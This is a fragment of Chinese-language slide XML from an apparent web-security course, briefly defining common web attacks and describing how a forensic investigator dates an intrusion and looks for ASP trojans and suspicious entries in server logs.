                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所提供最多、最丰富的服务，也是受到攻击最多的服务。常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用层攻击方式有下列几种，其中最具威胁、最常见，也是最见效的手法就是利用漏洞，进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击和缓冲区溢出攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数篡改攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：通过修改发送给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器的数据，非法访问数据库中的所有记录。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：程序对接受的输入数据没有进行有效的检测导致错误，造成程序崩溃或者执行攻击者的命令。攻击者往往利用超出缓冲区大小的请求来淹没服务器，以达到攻陷和控制服务器的目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>篡改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>值，访问不属于未授权的账户。攻击者也可以窃取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并访问用户的账户，而不必输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和口令或进行其他验证。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令植入攻击法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：攻击者通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用向后端服务器传送恶意命令，以非法访问数据后台数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：当用户点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时，执行恶意代码，导致用户机密信息被窃。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用向数据库传送恶意命令，以达到修改或破坏服务器数据的目的。攻击者把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令插入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>辨认相关的事件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="843558"/>
            <a:ext cx="7272808" cy="1980863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器的记录是最直接和有效的方法。但日志记录很庞大，查看日志记录相当繁琐，如抓不住重点，攻击线索就容易被忽略。一般来讲，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来提交的命令，都会在服务器上留下相应的记录，这就为取证提供了依据。可用对应的关键字来进行搜索，检查日志文件中是否有可疑的安全事件，包括：企图运行可执行文件或脚本的多次失败的命令；来自一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址的过多失败的登录尝试；访问和修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的失败的尝试；未经授权企图将文件上载到包含可执行文件的文件夹等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>辨认相关的事件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="843558"/>
            <a:ext cx="7272808" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>确定入侵时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一般方法是根据相关文件的最后修改时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如被篡改了的主页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来判断入侵时间，再找出在该时间点附近的其他文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这里面有可能包含攻击者上传的后门程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>辨认相关的事件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="555526"/>
            <a:ext cx="7272808" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从日志中找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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注入也往往会伴随着植入木马，可以是传统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C/S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马，也可以是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马。由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>木马都会在服务器上执行文件操作，因此它们大多会调用下面的对象：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
